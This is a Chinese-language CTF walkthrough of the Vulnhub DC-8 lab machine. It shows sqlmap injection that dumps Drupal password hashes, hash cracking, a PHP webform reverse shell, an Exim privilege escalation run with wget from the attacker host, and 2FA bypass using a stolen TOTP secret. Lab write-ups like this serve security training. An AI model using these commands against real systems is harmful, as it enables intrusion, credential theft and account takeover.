Vulnhub DC_8

前言

vulnhub dc8

https://www.vulnhub.com/entry/dc-8,367/

靶机IP

1
192.168.1.13

信息收集

1
nmap -p- --min-rate 10000 192.168.1.13 -oN nmap/port.txt
1
2
3
PORT   STATE SERVICE
22/tcp open  ssh
80/tcp open  http
1
nmap -sT -sC -sV -O -p22,80 192.168.1.13 -oN nmap/detail.txt
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 7.4p1 Debian 10+deb9u1 (protocol 2.0)
| ssh-hostkey: 
|   2048 35:a7:e6:c4:a8:3c:63:1d:e1:c0:ca:a3:66:bc:88:bf (RSA)
|   256 ab:ef:9f:69:ac:ea:54:c6:8c:61:55:49:0a:e7:aa:d9 (ECDSA)
|_  256 7a:b2:c6:87:ec:93:76:d4:ea:59:4b:1b:c6:e8:73:f2 (ED25519)
80/tcp open  http    Apache httpd
|_http-title: Welcome to DC-8 | DC-8
|_http-server-header: Apache
|_http-generator: Drupal 7 (http://drupal.org)
| http-robots.txt: 36 disallowed entries (15 shown)
| /includes/ /misc/ /modules/ /profiles/ /scripts/ 
| /themes/ /CHANGELOG.txt /cron.php /INSTALL.mysql.txt 
| /INSTALL.pgsql.txt /INSTALL.sqlite.txt /install.php /INSTALL.txt 
|_/LICENSE.txt /MAINTAINERS.txt
MAC Address: 08:00:27:8C:51:C4 (Oracle VirtualBox virtual NIC)
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: general purpose
Running: Linux 3.X|4.X
OS CPE: cpe:/o:linux:linux_kernel:3 cpe:/o:linux:linux_kernel:4
OS details: Linux 3.2 - 4.14
Network Distance: 1 hop
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

  • 开放端口
    • 22/tcp: SSH (OpenSSH 7.4p1)
    • 80/tcp: HTTP (Apache, 运行 Drupal 7)
  • CMS: Drupal 7
  • 系统:Linux 3.2 - 4.14
1
dirsearch -u http://192.168.1.13 -i 200,301
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
[07:01:14] 200 -   33KB - /CHANGELOG.txt
[07:01:16] 200 -  769B  - /COPYRIGHT.txt
[07:01:29] 301 -  237B  - /includes  ->  http://192.168.1.13/includes/
[07:01:31] 200 -  868B  - /INSTALL.mysql.txt
[07:01:31] 200 -    1KB - /install.php
[07:01:31] 200 -  842B  - /INSTALL.pgsql.txt
[07:01:31] 200 -    1KB - /install.php?profile=default
[07:01:32] 200 -    6KB - /INSTALL.txt
[07:01:35] 200 -    7KB - /LICENSE.txt
[07:01:38] 200 -    2KB - /MAINTAINERS.txt
[07:01:40] 301 -  233B  - /misc  ->  http://192.168.1.13/misc/
[07:01:41] 301 -  236B  - /modules  ->  http://192.168.1.13/modules/
[07:01:44] 200 -    2KB - /node
[07:01:52] 301 -  237B  - /profiles  ->  http://192.168.1.13/profiles/
[07:01:53] 200 -    2KB - /README.txt
[07:01:55] 200 -  744B  - /robots.txt
[07:01:56] 301 -  236B  - /scripts  ->  http://192.168.1.13/scripts/
[07:01:59] 301 -  234B  - /sites  ->  http://192.168.1.13/sites/
[07:01:59] 200 -  129B  - /sites/all/libraries/README.txt
[07:01:59] 200 -    0B  - /sites/example.sites.php
[07:01:59] 200 -  545B  - /sites/all/themes/README.txt
[07:01:59] 200 -  715B  - /sites/all/modules/README.txt
[07:01:59] 200 -  431B  - /sites/README.txt
[07:02:05] 301 -  235B  - /themes  ->  http://192.168.1.13/themes/
[07:02:08] 200 -    3KB - /UPGRADE.txt
[07:02:09] 200 -    2KB - /user
[07:02:09] 200 -    2KB - /user/
[07:02:09] 200 -    2KB - /user/login/
[07:02:11] 200 -  177B  - /views/ajax/autocomplete/user/a
[07:02:13] 200 -    2KB - /web.config
[07:02:16] 200 -   42B  - /xmlrpc.php

一个个目录看完,并没有找到有用的信息

SQL注入

主页Detail栏发现存在参数sql注入

1
http://192.168.1.13/?nid=1
1
2
3
4
sqlmap -u "http://192.168.1.13/?nid=1" -p nid --dbs --batch --random-agent

[*] d7db
[*] information_schema
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
sqlmap -u "http://192.168.1.13/?nid=1" -p nid --dbs --batch --random-agent -D d7db --tables



| block                       |
| cache                       |
| filter                      |
| history                     |
| role                        |
| system                      |
| actions                     |
| authmap                     |
| batch                       |
| block_custom                |
| block_node_type             |
| block_role                  |
| blocked_ips                 |
| cache_block                 |
| cache_bootstrap             |
| cache_field                 |
| cache_filter                |
| cache_form                  |
| cache_image                 |
| cache_menu                  |
| cache_page                  |
| cache_path                  |
| cache_views                 |
| cache_views_data            |
| ckeditor_input_format       |
| ckeditor_settings           |
| ctools_css_cache            |
| ctools_object_cache         |
| date_format_locale          |
| date_format_type            |
| date_formats                |
| field_config                |
| field_config_instance       |
| field_data_body             |
| field_data_field_image      |
| field_data_field_tags       |
| field_revision_body         |
| field_revision_field_image  |
| field_revision_field_tags   |
| file_managed                |
| file_usage                  |
| filter_format               |
| flood                       |
| image_effects               |
| image_styles                |
| menu_custom                 |
| menu_links                  |
| menu_router                 |
| node                        |
| node_access                 |
| node_revision               |
| node_type                   |
| queue                       |
| rdf_mapping                 |
| registry                    |
| registry_file               |
| role_permission             |
| search_dataset              |
| search_index                |
| search_node_links           |
| search_total                |
| semaphore                   |
| sequences                   |
| sessions                    |
| shortcut_set                |
| shortcut_set_users          |
| site_messages_table         |
| taxonomy_index              |
| taxonomy_term_data          |
| taxonomy_term_hierarchy     |
| taxonomy_vocabulary         |
| url_alias                   |
| users                       |
| users_roles                 |
| variable                    |
| views_display               |
| views_view                  |
| watchdog                    |
| webform                     |
| webform_component           |
| webform_conditional         |
| webform_conditional_actions |
| webform_conditional_rules   |
| webform_emails              |
| webform_last_download       |
| webform_roles               |
| webform_submissions         |
| webform_submitted_data      |
1
sqlmap -u "http://192.168.1.13/?nid=1" -p nid --dbs --batch --random-agent -D d7db -T users --dump
用户名 邮箱 密码哈希 (Drupal 7 $S$)
admin dcau-user@outlook.com $S$D2tRcYRyqVFNSc0NvYUrYeQbLQg5koMKtihYTIDC9QQqJi3ICg5z
john john@blahsdfsfd.org $S$DqupvJbxVmqjr6cYePnx2A891ln7lsuku/3if/oRVZJaz5mKC2vF

破解

1
john --wordlist=/usr/share/wordlists/rockyou.txt hashes.txt

得到凭据

1
john:turtle

成功登入后台

GetShell

登录到后台,在Contact Us -> Webfirm -> Form setting可以写入php代码

image-20260224210242320

提交contact us表单后则会进入植入代码的页面

image-20260224210344946

反弹shell

image-20260224211357096

exim提权

搜索suid发现存在exim4

查看版本

1
2
3
/usr/sbin/exim4 -bV

Exim version 4.89 #2 built 14-Jun-2017 05:03:07
1
searchsploit exim | grep "Privilege"
1
2
3
wget http://192.168.1.17:8080/46996.sh
chmod +x 46996.sh
./46996.sh -m netcat

image-20260224220345897

得到flag

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
Brilliant - you have succeeded!!!






888       888          888 888      8888888b.                             888 888 888 888
888   o   888          888 888      888  "Y88b                            888 888 888 888
888  d8b  888          888 888      888    888                            888 888 888 888
888 d888b 888  .d88b.  888 888      888    888  .d88b.  88888b.   .d88b.  888 888 888 888
888d88888b888 d8P  Y8b 888 888      888    888 d88""88b 888 "88b d8P  Y8b 888 888 888 888
88888P Y88888 88888888 888 888      888    888 888  888 888  888 88888888 Y8P Y8P Y8P Y8P
8888P   Y8888 Y8b.     888 888      888  .d88P Y88..88P 888  888 Y8b.      "   "   "   "
888P     Y888  "Y8888  888 888      8888888P"   "Y88P"  888  888  "Y8888  888 888 888 888






Hope you enjoyed DC-8.  Just wanted to send a big thanks out there to all those
who have provided feedback, and all those who have taken the time to complete these little
challenges.


I'm also sending out an especially big thanks to:


@4nqr34z
@D4mianWayne
@0xmzfr
@theart42


This challenge was largely based on two things:


1. A Tweet that I came across from someone asking about 2FA on a Linux box, and whether it was worthwhile.
2. A suggestion from @theart42


The answer to that question is...


If you enjoyed this CTF, send me a tweet via @DCAU7.

2FA认证

作者在题目中提到了2FA(双因素认证)

简单的说就是要在认证的时候输入密码以及根据密钥动态生成的Verification code

已经拿到root,进行2FA实验

  • /var/log/auth.log:记录了所有与**身份验证(Authentication)**相关的事件。

  • .google_authenticator :存储了该用户启用 Google Authenticator 时的密钥种子(Secret Key)

通过/var/log/auth.log发现dc8user配置了2FA

在dc8user家目录得到了.google_authenticator

1
2
3
4
5
6
7
NRJWQLHCQYKWD27G2GW4XFBR7Q   <-- 1. 秘密密钥 (Secret Key)
" WINDOW_SIZE 17             <-- 2. 窗口大小 (允许的时间偏差)
" TOTP_AUTH                  <-- 3. 认证类型 (基于时间的一次性密码)
27017752                     <-- 4. 备用代码 (Scratch Code 1)
93723285                     <-- 5. 备用代码 (Scratch Code 2)
97959003                     <-- 6. 备用代码 (Scratch Code 3)
36240515                     <-- 7. 备用代码 (Scratch Code 4)

根据密钥生成验证码

1
oathtool --totp -b NRJWQLHCQYKWD27G2GW4XFBR7Q

从kali即可无需密码登录dc8user

输入Verification code

image-20260224222927803

靶场
Vulnhub DC_8
http://xiaowu5.cn/2026/02/24/Vulnhub-DC-8/
作者
5
发布于
2026年2月24日
许可协议
BY XIAOWU